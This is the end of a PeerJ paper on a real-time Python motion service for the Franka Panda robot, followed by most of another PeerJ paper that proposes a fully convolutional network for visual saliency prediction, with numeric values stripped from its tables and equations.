thus, whereas it is expected that the required frequency and tracking delay will be a challenge for a python-based application when it comes to real-time control of cutting, this is not expected to be a challenge for real-time grasping applications. it was originally under consideration to use the reflexxes (http://reflexxes.ws) library developed by torsten kröger for the underlying interpolation mathematics in the presented motion service process. however, the reflexxes version under a free software license, lgpl v . , only provides c -smooth trajectories. for generating c -smooth trajectories, a commercial license of reflexxes must be purchased. the presented software is intended to be free (gpl), and thus the reflexxes library was not chosen. conclusion in summary, this work has • established a re-connectable real-time motion service via the franka control interface for the panda robot; • characterized the real-time trajectory execution performance by illustrating the tracking delay; • demonstrated that real-time motion application from python is possible; • indicated the feasibility of using the external force-torque estimator provided by libfranka at the real-time application level. acknowledgements thanks to ekrem misimi at sintef ocean for general guidance and for supporting the work. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://reflexxes.ws http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the underlying work and the writing of this paper was funded by the norwegian research council (https://www.forskningsradet.no/en/) in the project ‘‘innovative and flexible food processing technology in norway’’ with project number (https://prosjektbanken.forskningsradet.no/#/project/nfr/ ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: norwegian research council. innovative and flexible food processing technology in norway: . competing interests morten lind is an employee of sintef manufacturing as. the author declares that he has no competing interests. author contributions • morten lind conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is publicly available in the ‘‘franka motion service" repository at gitlab: https: //gitlab.com/sintefmanufacturing/franka_motion_service.git. data are publicly available in the ‘‘fms test data" repository at https://gitlab.com/sintefmanufacturing/fms-test- data.git. references andersen tt. . optimizing the universal robots ros driver. technical report. technical university of denmark, department of electrical engineering. available at https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver. andersen tt, amor hb, andersen na, ravn o. . measuring and modelling delays in robot manipulators for temporally precise control using machine learning. in: ieee th international conference on machine learning and applications (icmla). piscataway: ieee, – . eggen r, eggen m. . thread and process efficiency in python. in: proceedings of the international conference on parallel and distributed processing techniques and applications. – . lind ( ), peerj comput. sci., doi . 
/peerj-cs. / https://peerj.com https://www.forskningsradet.no/en/ https://prosjektbanken.forskningsradet.no/#/project/nfr/ https://gitlab.com/sintefmanufacturing/franka_motion_service.git https://gitlab.com/sintefmanufacturing/franka_motion_service.git https://gitlab.com/sintefmanufacturing/fms-test-data.git https://gitlab.com/sintefmanufacturing/fms-test-data.git https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver http://dx.doi.org/ . /peerj-cs. finn dl. . quintic hermite interpolation. course notes. available at https://studylib. net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h.... krogh ft. . efficient algorithms for polynomial interpolation and numerical differentiation. mathematics of computation ( ): – doi . /s - - - -x. kröger t, wahl fm. . online trajectory generation: basic concepts for instantaneous reactions to unforeseen events. ieee transactions on robotics ( ): – doi . /tro. . . lenz i, knepper ra, saxena a. . deepmpc: learning deep latent features for model predictive control. in: kavraki le, hsu d, buchli j, eds. proceedings of robotics: science and systems xi. sapienza university of rome, rome: rss foundation. available at https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss .pdf . lind m, schrimpf j, ulleberg t. . open real-time robot controller framework. in: lien tk, ed. cirp conference on assembly technologies and systems. no- , trondheim: tapir academic press, – . lind m, tingelstad l, schrimpf j. . real-time robot trajectory generation with python. in: workshop on robot motion planning: online, reactive, and in real-time. ieee/rjs. mihelj m, Šlajpah s, Čepon p, munih m. . ycontrol - open architecture controller for yaskawa motoman mh robot. in: ieee international conference on control applications. piscataway: ieee, – . morrison d, leitner j, corke p. . closing the loop for robotic grasping: a real-time, generative grasp synthesis approach. in: kress-gazit h, srinivasa ss, howard t, atanasov n, eds. proceedings of robotics: science and systems xiv, carnegie mellon university. pittsburgh: rss foundation doi . /rss. .xiv. . reyssat e, tallinen t, merrer ml, mahadevan l. . slicing softly with shear. physical review letters ( ): doi . /physrevlett. . . schrimpf j. . sensor-based real-time control of industrial robots. phd thesis, norwe- gian university of science and technology, trondheim, norway. schrimpf j, lind m, mathisen g.. . real-time analysis of a multi-robot sewing cell. in: ieee international conference on industrial technology (icit). piscataway: ieee, – . spitzbart a. . a generalization of hermite’s interpolation formula. the american mathematical monthly ( ): – doi . / . . . lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://studylib.net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h... https://studylib.net/doc/ /ma- -geometric-modelling-course-notes--day- -quintic-h... http://dx.doi.org/ . /s - - - -x http://dx.doi.org/ . /tro. . https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss .pdf http://dx.doi.org/ . /rss. .xiv. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. submitted december accepted june published july corresponding author bashir muftah ghariba, bmg @mun.ca academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright ghariba et al. distributed under creative commons cc-by . 
open access a novel fully convolutional network for visual saliency prediction bashir muftah ghariba, mohamed s. shehata and peter mcguire faculty of engineering & applied science, memorial university of newfoundland, st. john's, nl, canada department of electrical and computer engineering, faculty of engineering, elmergib university, khoms, libya department of computer science, mathematics, physics and statistics, university of british columbia, kelowna, bc, canada c-core, st john's, nl, canada abstract a human visual system (hvs) has the ability to pay visual attention, which is one of the many functions of the hvs. despite the many advancements being made in visual saliency prediction, there continues to be room for improvement. deep learning has recently been used to deal with this task. this study proposes a novel deep learning model based on a fully convolutional network (fcn) architecture. the proposed model is trained in an end-to-end style and designed to predict visual saliency. the entire proposed model is trained from scratch to extract distinguishing features. the proposed model is evaluated using several benchmark datasets, such as mit , mit , toronto, and dut-omron. the quantitative and qualitative experimental analyses demonstrate that the proposed model achieves superior performance for predicting visual saliency. subjects computer vision, data mining and machine learning keywords deep learning, convolutional neural networks, fully convolutional network, semantic segmentation, encoder-decoder architecture, human eye fixation introduction a human visual system (hvs) processes a part of the visual scene instead of the whole scene. this phenomenon is called human visual attention (hva), also referred to as visual saliency prediction, which is an important research area in the field of computer vision. hva is also known as human eye fixation prediction, visual saliency prediction, or saliency map detection. visual saliency prediction is also beneficial for other applications in the computer vision field, including salient object detection (liu & han, ), image retrieval (huang et al., ), multiresolution imaging (lu & li, ), and scene classification (cheng et al., ; lu, li & mou, ; yao et al., ). many models have been developed to predict visual saliency, the most popular output being the saliency map. saliency maps describe the probability that each image pixel will attract human attention. in other words, saliency maps are images that display the unique qualities of each pixel in a given image (gao & vasconcelos, ). to produce a saliency map, the salient points in the image are collected and convolved with a gaussian filter (gao & vasconcelos, ). the probability that each pixel in the image will attract human attention is represented by a heat map or gray-scale image. notably, saliency maps smooth the image, making it more meaningful and easier to analyze. this is useful, for example, for conditioning an image captioning architecture, because it indicates what is salient and what is not (mackenzie & harris, ).
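the construction just described, collecting salient (fixation) points and convolving them with a gaussian filter, can be sketched in a few lines. the image size, fixation coordinates and gaussian sigma below are illustrative values only, not those of any particular dataset.

```python
# sketch: accumulate fixation points into a binary map and blur with a gaussian
# filter to obtain a continuous saliency (heat) map.
import numpy as np
from scipy.ndimage import gaussian_filter

def saliency_from_fixations(shape, fixations, sigma=25.0):
    """shape: (rows, cols); fixations: iterable of (row, col) eye-fixation points."""
    fix_map = np.zeros(shape, dtype=float)
    for r, c in fixations:
        fix_map[int(r), int(c)] = 1.0             # binary fixation map
    sal = gaussian_filter(fix_map, sigma=sigma)    # smooth into a continuous map
    if sal.max() > 0:
        sal /= sal.max()                           # normalize to [0, 1] for display
    return sal

if __name__ == "__main__":
    sal_map = saliency_from_fixations((480, 640), [(120, 200), (300, 420), (240, 320)])
    print(sal_map.shape, "peak value:", round(float(sal_map.max()), 3))
```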
to evaluate the saliency map, human eye fixation data in free viewing is used because there is a direct link between human eye movement and visual attention (mackenzie & harris, ). generally, hva runs on two approaches. the first is a bottom-up approach which utilizes low-level features, including intensity, color, edge orientation, and texture (gao, mahadevan & vasconcelos, ; le meur et al., ). such an approach attempts to decide regions that show obvious characteristics of their surroundings. the second is a top-down approach, which is task-driven and requires an explicit understanding of the context of the visual scene. moreover, it depends on the features of the object of interest (gao, han & vasconcelos, ; kanan et al., ). the deep convolutional neural network (cnn) is the most widely utilized deep learning method for image processing applications (mahdianpari et al., ). specifically, cnn is capable of extracting discriminant visual features (e.g., -d spatial features) by applying a hierarchy of convolutional filters using multiple nonlinear transformations. studies have also used convolutional neural networks (cnns) for studying saliency map detection to confirm the importance of end-to-end task learning and automatic feature extraction (fang et al., ; jetley, murray & vig, ; kruthiventi et al., ; pan et al., ; vig, dorr & cox, ). the deep cnn model achieves an even higher classification accuracy. for example, deep learning techniques have achieved superior results in multiple tasks, such as driverless car, scene classification, object (e.g., vehicle) detection, image classification, and semantic segmentation. however, deep learning architecture requires sufficient training data for superior performance on several sets of visual tasks, such as local image detection (girshick et al., ), global image classification (krizhevsky, sutskever & hinton, ), and semantic segmentation (long, shelhamer & darrell, ). although several deep learning models have been proposed to solve the problem of saliency prediction, and those models provide good performance. however, those models essentially proposed for object recognition and then fine-tuned for saliency prediction. consequently, the pixel-based classification of visual attention task remains challenging. this highlights the necessity of designing a novel fcn model specifically for the task of saliency prediction. in addition, our proposed model is designed for training from scratch. therefore, we added some modules (e.g., three inception modules and residual modules) to improve the model performance. the inception module is useful since benefits from filters with different sizes in one layer, which contribute to multi-scale inference and enhance contextual information. this highlights the necessity of combining feature maps at different resolution to extract useful information. in addition the residual module recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. in this study, we utilized an encoder–decoder structure based on the fully convolutional network (fcn) architecture to address the problem of bottom-up visual attention in visual saliency predication. fcn has the same architecture as the cnn network, but unlike cnn it does not contain any fully connected layers. fcns are also powerful visual models that ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
generate high-level features from low-level features to produce hierarchies. moreover, fcn utilizes multi-layer information and addresses pixel-based classification tasks using an end-to-end style (long, shelhamer & darrell, ). in addition, the proposed model also includes both inception and residual modules to improve multi-scale inference and the recovery of more accurate information, respectively. this study proposes a new model based on an encoder–decoder structure (i.e., fcn) to improve the performance of visual saliency prediction. the specific contributions of this work are as follows: ( ) a new model of fcn architecture for visual saliency prediction that uses two types of modules is proposed. the first module contains three stages of inception modules, improves the multi-scale inference, and performs contextual information. the second module contains one stage from the residual module and also recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. ( ) four well-known datasets, including toronto, mit , mit , and dut- omron, were used to evaluate the proposed model. the experiments demonstrate that the proposed model achieves results comparable or superior to those of other state-of-the-art models. the remainder of this article is organized as follows. first, the proposed model is described in more detail in ‘related work’ and the materials and methods used to produce and evaluate the proposed model are discussed in ‘material and methods’. ‘experimental results’ presents the quantitative and qualitative experimental results obtained from the four datasets. finally, the results are summarized, and possible future uses and applications of the proposed model are explored in ‘discussion’. related work visual saliency prediction has received attention from computer vision researchers for many years. the earliest computational model was introduced by koch and ullman (krizhevsky, sutskever & hinton, ), which inspired the work of itti, koch & niebur ( ). this model combines low level features at multiple scales to generate saliency maps. subsequently, many models have been proposed to address visual saliency detection (fu et al., ; gong et al., ; guo et al., ; li et al., ; liu et al., ; liu et al., a; liu, zou & meur, b; wang & shen, ; wang et al., a; wang et al., ; wang et al., b). most of this work has been focused on how to detect visual saliency in an image/video using different methods (borji & itti, ; wang, shen & shao, a; wang et al., b). most conventional attention models are based on a bottom-up strategy. these contain three important steps to detect visual saliency: feature extraction, saliency extraction, and saliency combination. salient regions in the visual scene are first extracted from their surroundings through hand-crafted low-level features (e.g., intensity, color, edge orientation, and texture), and center–surround contrast is widely used for generating saliency. the saliency may also be produced by the relative difference between the region and its local surroundings (itti, koch & niebur, ; harel, koch & perona, ; bruce & ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tsotsos, ). the last step for saliency detection combines several features to generate the saliency map. recently, many visual saliency models have been introduced for object recognition. deep-learning models achieved better performance compared to non-deep learning models. 
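before turning to the deep models, the center-surround contrast idea used by the classical bottom-up pipeline described above can be illustrated with a small sketch. the two gaussian scales and the toy image are arbitrary choices for demonstration, not parameters from any cited model.

```python
# sketch of center-surround contrast: compare a feature map (here intensity) between
# a fine "center" scale and a coarse "surround" scale; the absolute difference
# highlights regions that stand out from their local context.
import numpy as np
from scipy.ndimage import gaussian_filter

def center_surround(intensity, sigma_center=2.0, sigma_surround=16.0):
    center = gaussian_filter(intensity, sigma_center)
    surround = gaussian_filter(intensity, sigma_surround)
    conspicuity = np.abs(center - surround)        # center-surround contrast
    return conspicuity / (conspicuity.max() + 1e-12)

if __name__ == "__main__":
    img = np.zeros((256, 256))
    img[100:140, 100:140] = 1.0                    # a bright patch on a dark background
    c = center_surround(img)
    print("most conspicuous location:", np.unravel_index(np.argmax(c), c.shape))
```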
the deep neural networks (dnn) (vig, dorr & cox, ), was trained from scratch to predict saliency. subsequent models were based on pre-trained models, for example, the deepgaze i model (kümmerer, theis & bethge, ), which was the first to be trained on a pre-trained model (alexnet krizhevsky, sutskever & hinton, ) trained on imagenet (deng et al., ), and outperformed the training stage from scratch. deepgaze ii (kümmerer, wallis & bethge, ) has also has been proposed based on a pre-trained model (vgg- simonyan & zisserman, ), where attention information was extracted from the vggnet without fine-tuning the attention task. next, the deepfix model kruthiventi, ayush & babu ( ) was proposed by kruthiventi et al. based on a pre-trained model vgg- . furthermore, in mahadevan & vasconcelos ( ) object detection and saliency detection were carried out using a deep convolutional neural network (cnn). finally, the salicon net model (huang et al., ) was proposed to capture multi-scale saliency using combined fine and coarse features from two-stream cnns that were trained with multi-scale inputs. since the superior success of transfer learning models for visual saliency prediction has been established, several new models have been proposed that have improved saliency prediction performance. for instance, the salicon model fine-tunes a mixture of deep features (huang et al., ) using alexnet (krizhevsky, sutskever & hinton, ), vgg- network (simonyan & zisserman, ), and googlenet (szegedy et al., ) for visual saliency prediction. pdp (jetley, murray & vig, ) and deepfix (kruthiventi, ayush & babu, ) were used on the vgg- network for the same task using mit and the salicon dataset, and fucos (bruce, catton & janjic, ) fine-tunes features that were trained on the pascal dataset. overall, deepfix and salicon models demonstrated significantly improved performance compared to deepgaze i in the mit benchmark. material and methods proposed model the proposed model follows an fcn structure (i.e., a pixel-based approach) and the generic encoder–decoder form. the important difference between cnn and fcn networks is that the latter has learning filters throughout its structure. even the decision-making layers at the end of the network are filters. fcns also do not have any fully connected layers that are usually available at the end of the network. figure explains the architecture of the proposed model for visual saliency prediction and the configuration of the proposed model is explained in table . the encoder stage contains three blocks of convolution layers, each of which is followed by batch normalization, rectified linear unit (relu), and max pooling. the encoder stage is the same as that of a conventional cnn and generates feature maps by down-sample pooling. the decoder stage also transposes convolutional layers but does so in the opposite direction. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure architecture of the proposed model. full-size doi: . /peerjcs. /fig- table configuration of the proposed model. layer type filter size encoder convolution × , residual module (*), convolution × , max pooling × convolution × , max pooling × decoder inception module (*), transposed convolution × , convolution × , convolution × , transposed convolution × , convolution × , pixel classification layer − therefore, the decoder stage produces label maps (up-sampling) with the same input image size. 
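to make the encoder-decoder idea concrete, the following compact pytorch sketch builds a small fcn with an inception-style block (parallel filter sizes, concatenated) and a residual block (identity-style shortcut, element-wise sum) of the kind detailed below. the channel counts, depths and input size are illustrative assumptions and do not reproduce the authors' exact configuration, which is summarized in their figures and tables.

```python
# illustrative encoder-decoder fcn with inception-style and residual blocks,
# producing a pixel-wise saliency map of the same spatial size as the input.
import torch
import torch.nn as nn

def conv_bn_relu(c_in, c_out, k):
    return nn.Sequential(
        nn.Conv2d(c_in, c_out, k, padding=k // 2),
        nn.BatchNorm2d(c_out), nn.ReLU(inplace=True))

class InceptionBlock(nn.Module):
    """three parallel branches with different receptive fields, concatenated."""
    def __init__(self, c_in, c_branch):
        super().__init__()
        self.b1 = nn.Sequential(conv_bn_relu(c_in, c_branch, 1), conv_bn_relu(c_branch, c_branch, 3))
        self.b2 = nn.Sequential(conv_bn_relu(c_in, c_branch, 1), conv_bn_relu(c_branch, c_branch, 5))
        self.b3 = conv_bn_relu(c_in, c_branch, 1)
    def forward(self, x):
        return torch.cat([self.b1(x), self.b2(x), self.b3(x)], dim=1)

class ResidualBlock(nn.Module):
    """bottleneck branch plus a 1x1 shortcut, combined by element-wise sum."""
    def __init__(self, c_in, c_out):
        super().__init__()
        self.branch = nn.Sequential(conv_bn_relu(c_in, c_out, 1),
                                    conv_bn_relu(c_out, c_out, 3),
                                    conv_bn_relu(c_out, c_out, 1))
        self.shortcut = conv_bn_relu(c_in, c_out, 1)
    def forward(self, x):
        return self.branch(x) + self.shortcut(x)

class SaliencyFCN(nn.Module):
    def __init__(self):
        super().__init__()
        self.encoder = nn.Sequential(
            conv_bn_relu(3, 32, 3), ResidualBlock(32, 32), nn.MaxPool2d(2),
            conv_bn_relu(32, 64, 3), nn.MaxPool2d(2))
        self.decoder = nn.Sequential(
            InceptionBlock(64, 32),                        # 3 * 32 = 96 channels out
            nn.ConvTranspose2d(96, 64, 2, stride=2), nn.ReLU(inplace=True),
            conv_bn_relu(64, 32, 3),
            nn.ConvTranspose2d(32, 16, 2, stride=2), nn.ReLU(inplace=True),
            nn.Conv2d(16, 1, 1))                           # pixel-wise saliency logits
    def forward(self, x):
        return torch.sigmoid(self.decoder(self.encoder(x)))

if __name__ == "__main__":
    out = SaliencyFCN()(torch.randn(1, 3, 128, 128))
    print(out.shape)   # same spatial size as the input, one saliency channel
```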
the transposed convolution layers contain un-pooling and convolution operators. unlike the max-pooling operation, the un-pooling operation increases the size of feature maps through the decoding stage. in addition, the image input size of the proposed model is × pixels. figure illustrates the proposed model architecture to predict visual saliency. three inception modules are also used in the proposed model. inception modules are useful because they benefit from different sized filters in one layer, which contributes to the multi-scale inference and enhances contextual information (long, shelhamer & darrell, ). in addition, a residual module is also added to the proposed model because it effectively avoids the vanishing gradient problem by introducing an identity shortcut connection (lin et al., ). moreover, activations from a previous layer are reused by the residual module for the adjacent layer to learn its weights. figure shows the architecture of the inception and residual modules, respectively. figure a explains the layers of the inception module which contains three branches. the first two contain a sequence of two convolution filters, where the patch sizes of the layers are × , the second layer is × , and ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure architecture of (a) inception and (b) residual modules. full-size doi: . /peerjcs. /fig- table configuration of inception and residual modules. module convolutional configuration operation output inception × , × , × , × , × , concatenation residual × , × , × , × , element-wise sum the last layer is × , respectively. the third branch contains only one convolutional filter which has a patch size of × . each convolutional layer is followed by batch normalization and relu. figure b explains the structure of the residual module, which contains two branches. the first branch has a stack of three convolutional filters, sized × , × , and × , respectively. the second branch has a single × convolutional filter. the two branches are combined by element-wise summation. table explains the number of each filter in the two modules (i.e., inception and residual). notably, the convolutional module contains a convolutional d, batch normalization, as well as a relu layer. the transposed convolutional module also contains the same layers as the convolutional module. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. semantic segemnation the segmentation task plays an important role in image understanding and is essential for image analysis tasks (karami, shehata & smith, ). in semantic segmentation, each region or pixel is labeled as a class, such as flower, person, road, sky, ocean, or car. many applications use semantic segmentation techniques, such as autonomous driving, bio medical image diagnosis, robotic navigation, localization, and scene understanding. furthermore, deep neural networks (dnns) are commonly used as effective techniques for semantic segmentation (long, shelhamer & darrell, ). semantic segmentation works with semantics and location; global information determines the ‘‘what’’ while local information determines the ‘‘where’’ of an image. deep feature hierarchies encode semantics and location in a nonlinear local-to-global pyramid (long, shelhamer & darrell, ). 
our proposed model (i.e., fcn) uses semantic segmentation techniques to assign each pixel in the given image into appropriate classes (i.e., foreground or background) in order to predict visual saliency (i.e., saliency map generation). datasets the proposed model was trained using a standard available dataset (i.e., salicon) and subsequently tested on four other well-established datasets, including toronto, mit , mit , and dut-omron. all these datasets have different characteristics and so each is described below. salicon the largest dataset for visual attention applications on the popular microsoft common objects in context (ms coco) image database is salicon (lin et al., ). this dataset contains , training, , validation, and , testing images with a fixed resolution of x . while this dataset contains the ground truth data for the training and validation datasets, the test dataset ground truth data were unavailable (jiang et al., ). toronto one of the most widely used datasets for visual attention is the toronto dataset. it has color images with a resolution of x pixels. this dataset contains images that were captured in indoor and outdoor environments and has been free-viewed by human subjects (bruce & tsotsos, ). mit the mit dataset has natural images and the eye-tracking data of users who free viewed these images were used to generate saliency maps. this dataset is challenging since its images are highly variable and natural (judd, durand & torralba, ). a mit saliency benchmark website for model evaluation (http://saliency.mit.edu/results_mit .html) is available to evaluate any saliency model using this dataset. mit mit includes , images from the flicker and labelme collections. saliency maps of these images have also been generated from the eye-tracking data of users. this dataset ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://saliency.mit.edu/results_mit .html http://dx.doi.org/ . /peerj-cs. contains landscape and portrait images that vary in size from × to , × , pixels, making it the largest available eye fixation dataset (judd et al., ). dut-omron dut-omron has , high quality images that were manually selected from over , images. the largest height or width of this dataset is pixels and each image is represented by five subjects. there is more than one salient object in this type of dataset and the image has a more a complex background (riche et al., ). evaluation metrics several methods may be used to evaluate the correspondence between human eye fixation and model prediction (ghariba, shehata & mcguire, ). generally, saliency evaluation metrics are divided into distribution- and location-based metrics. previous studies on saliency metrics found it is difficult to perform a reasonable comparison for assessing saliency models using a single metric (riche et al., ). here, we accomplished our experiment by extensively considering several different metrics, including the similarity metric (sim), normalized scanpath saliency (nss), and auc. the last metric is the area under the receiver operating characteristic (roc) curve (e.g., auc-borji, and auc-judd). for clarification, we indicate the map of fixation locations as q, the predicted saliency map as s, and the continuous saliency map (distribution) as g. similarity metric (sim) the sim metric produces a histogram that is a measurement of the similarity between two distributions. this metric considers the normalized probability distributions of both the saliency and human eye fixation maps. 
sim is computed as the sum of the minimum values at each pixel, after normalizing the input maps. equation ( ) explains how to calculate the sim metric:

sim = \sum_{i} \min(S'(i), G'(i)),    ( )

where \sum_{i} S'(i) = 1, \sum_{i} G'(i) = 1, and S' and G' are the normalized saliency and fixation maps, respectively. importantly, a similarity of one indicates that the distributions are the same, whereas a zero indicates that they do not overlap.

normalized scanpath saliency (nss)
nss is a simple correspondence measure between saliency maps and ground truth data, computed as the average normalized saliency at fixated locations. nss is, however, susceptible to false positives and relative differences in saliency across the image (bylinskii et al., ). to calculate nss given a saliency map s and a binary map of fixation locations f,

nss = \frac{1}{N} \sum_{i=1}^{N} \bar{S}(i) \times F(i),    ( )

where N = \sum_{i} F(i) is the total number of human eye positions, \bar{S} = \frac{S - \mu(S)}{\sigma(S)}, and \sigma(S) is the standard deviation.

table : comparison of the quantitative scores of several models on the toronto (bruce & tsotsos, ) dataset, reporting nss, sim, auc-judd, and auc-borji for the itti, aim, judd model, gbvs, mr-cnn, and cas models and the proposed model.

auc-borji
the auc-borji metric, based on ali borji's code (borji et al., ), uses a uniform random sample of image pixels as negatives and defines false positives as any fixation (saliency) map values above the threshold of these pixels. the saliency map is treated as a binary classifier that separates positive from negative samples at varying thresholds, the values of which are sampled at a fixed step size. the proportion of the saliency map values above the threshold at the fixation locations is the true positive (tp) rate. conversely, the proportion of the saliency map values that occur above the threshold sampled from random pixels (as many samples as fixations, sampled uniformly from all image pixels) is the false positive (fp) rate.

auc-judd
the auc-judd metric (judd et al., ) is also popular for the evaluation of saliency models. as with auc-borji, positive and negative samples are separated at various thresholds by treating the saliency map as a binary classifier. unlike auc-borji, however, the thresholds are sampled from the saliency map's values. the proportion of the saliency map's values above a specific threshold at the fixation locations is the true positive (tp) rate. alternatively, the proportion of the saliency map's values that occur above the threshold of non-fixated pixels is the false positive (fp) rate.

experimental results
this section explains all the steps for implementing our work (see table for more details about the experimental steps). specifically, training, adjusting the parameters, validating, and testing the proposed model on the aforementioned datasets (i.e., toronto, mit , mit , and dut-omron) are described in detail.

model training
the most important step for the proposed model is model training. in this work, the proposed model was trained from scratch (i.e., full training). training models from scratch is challenging due to computational cost and data availability, leading to problems of overfitting. however, several techniques, such as normalization, data augmentation, and dropout layers, are useful for mitigating the problems caused by overfitting.
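for concreteness, the sim and nss metrics defined above translate directly into a few lines of numpy. this is an illustrative sketch of the two formulas, not the authors' evaluation code.

import numpy as np

def sim(saliency_map, fixation_map):
    # normalize both maps so that each sums to 1, then sum the pixel-wise minima
    s = saliency_map / saliency_map.sum()
    g = fixation_map / fixation_map.sum()
    return np.minimum(s, g).sum()

def nss(saliency_map, fixation_points):
    # fixation_points is a binary map of fixated pixels;
    # z-score the saliency map and average it over the fixated locations
    s_norm = (saliency_map - saliency_map.mean()) / saliency_map.std()
    return s_norm[fixation_points.astype(bool)].mean()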
the full-training style has two different categories. in the first category, the cnn architecture is fully designed and trained from scratch. in this case, the number of cnn layers, the pooling layers, the kind of activation function, the number of neurons, the learning rate, and the number of iterations should be determined. in the second category, the network architecture and the number of parameters remain unchanged, but the advantages of a pre-existing architecture are exploited and full training is applied to the given images. in this study, the first category was employed.

specifically, the proposed model was trained using the well-known salicon dataset (see 'salicon' for more details) and was also validated using a specific validation set (i.e., images). this dataset is the largest available for visual attention (i.e., , images for training, , for validation) and was created for saliency applications. at the beginning of the training task, all filter weights were randomly initialized because a pre-trained network was not used in this study. a mini-batch of images was used in each iteration and the learning rate was set to . . the proposed model parameters were learned by back-propagating the loss function with a stochastic gradient descent with momentum (sgdm) optimizer. since the number of images available for the training task was limited (i.e., , images), we used the data augmentation technique to increase the number of training images by creating modified versions of the images in the dataset. this augmentation was carried out to mitigate overfitting by rotating the images at ◦ intervals. it also improves performance and the proposed model's ability to generalize. figure illustrates the proposed model's training progress on the mentioned training images (salicon).

figure : value of validation accuracy (a) and loss as a function of epochs (b).

model testing
in this step, we evaluated the proposed model using the well-known toronto, mit , mit , and dut-omron datasets. based on the experimental results, one can see that the proposed model has the ability to predict visual saliency in a given image. the output for a test image is the saliency map, which is obtained from the last layer of the proposed model. all the training and testing tasks were performed on an intel cpu i - k machine with . ghz and gb ram. an nvidia geforce gtx ti gpu with gb of memory under cuda version . was also utilized in this work.

discussion
quantitative comparison of the proposed model with other advanced models
to evaluate the efficiency of the proposed model for predicting visual saliency, we compared it to the state-of-the-art models itti, aim, judd model, gbvs, mr-cnn, cas, salgan, deepgaze i, deepgaze ii, and ml-net. the models were applied to four datasets (i.e., toronto, mit , mit , and dut-omron), and the quantitative results are presented in tables , , and , respectively. all these models differ in terms of computational speed (i.e., run time). table lists the runtime properties of the proposed model as well as the other visual saliency models. from this table, one can see that the run time of the proposed model is about s on our machine, which has no gpu and uses an intel cpu i - k.
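as a concrete reference for the training recipe described above (random weight initialization, mini-batch training with an sgdm optimizer, and rotation-based augmentation of image/ground-truth pairs), one possible sketch follows. the framework, rotation step, learning rate, batch size, loss function, and epoch count are not legible in this copy, so every concrete value below is an assumption.

import numpy as np
import tensorflow as tf

def augment_by_rotation(images, maps):
    # rotate image and ground-truth saliency-map pairs together at 90-degree intervals (assumed step)
    aug_x, aug_y = [images], [maps]
    for k in (1, 2, 3):
        aug_x.append(np.rot90(images, k=k, axes=(1, 2)))
        aug_y.append(np.rot90(maps, k=k, axes=(1, 2)))
    return np.concatenate(aug_x), np.concatenate(aug_y)

def train(model, images, maps, val_images, val_maps):
    x, y = augment_by_rotation(images, maps)
    model.compile(
        optimizer=tf.keras.optimizers.SGD(learning_rate=1e-3, momentum=0.9),  # assumed values
        loss="binary_crossentropy",  # assumed pixel-wise loss for saliency maps
    )
    return model.fit(x, y, batch_size=32, epochs=50,  # assumed values
                     validation_data=(val_images, val_maps))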
notably, the main difference between the proposed model and other state-of-art models is that the proposed model was specifically designed for saliency prediction, whereas the other pre-trained models were essentially designed for object recognition and then fine-tuned for the visual saliency prediction task. in addition, the proposed model was trained from scratch, which requires a large number of training images to provide a reasonable performance; however, the largest dataset available for this application contains only , images (e.g., salicon), which is considered relatively small to train a model from scratch. table shows that, with the toronto dataset, the proposed model outperforms other models (deep and classical models) in terms of nss; however, in terms of sim, auc-judd, and auc-borji, the gbvs model provides the best results (note that the bolded values are the best results). from table , one can see that with the mit dataset, the model that provides the best performance is deepgaz ii in terms of the auc-judd and auc-borji metrics. however, the salgan model produces the best results for the sim metric, while the ml-net model provides the best value for the nss metric. in table (for mit dataset), one can see that the proposed model surpasses the other models in terms of the ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of the quantitative scores of several models on the mit (judd, durand & tor- ralba, ) dataset. model nss sim auc-judd auc-borji itti (itti, koch & niebur, ) . . . . aim (bruce & tsotsos ) . . . . judd model (judd et al., ) . . . . gbvs (harel, koch & perona, ) . . . . mr-cnn (liu et al., ) . . . . cas (goferman, zelnik-manor & tal, ) . . . . salgan (pan et al., ) . . . . deepgaze i (kümmerer, theis & bethge, ) . . . . deepgaze ii (kümmerer et al., ) . . . . ml-net (cornia et al., ) . . . . proposed model . . . . table comparison of the quantitative scores of several models on the mit (judd et al., ) dataset. model nss sim auc-judd auc-borji itti . . . . aim . . . . judd model . . . . gbvs . . . . mr-cnn . . . . cas . . . . salgan . . . . ml-net . . . – proposed model . . . . table comparison of the quantitative scores of several models on the dut-omron (yang et al., ) dataset. model nss sim auc-judd auc-borji itti . . . . aim . . . . gbvs . . . . cas . . . . proposed model . . . . sim and auc-judd metrics, while the gbvs model provides the best results for the nss metric. finally, table shows that, with the dut-omron dataset, the proposed model achieved the best result in terms of the auc-judd metric, while the 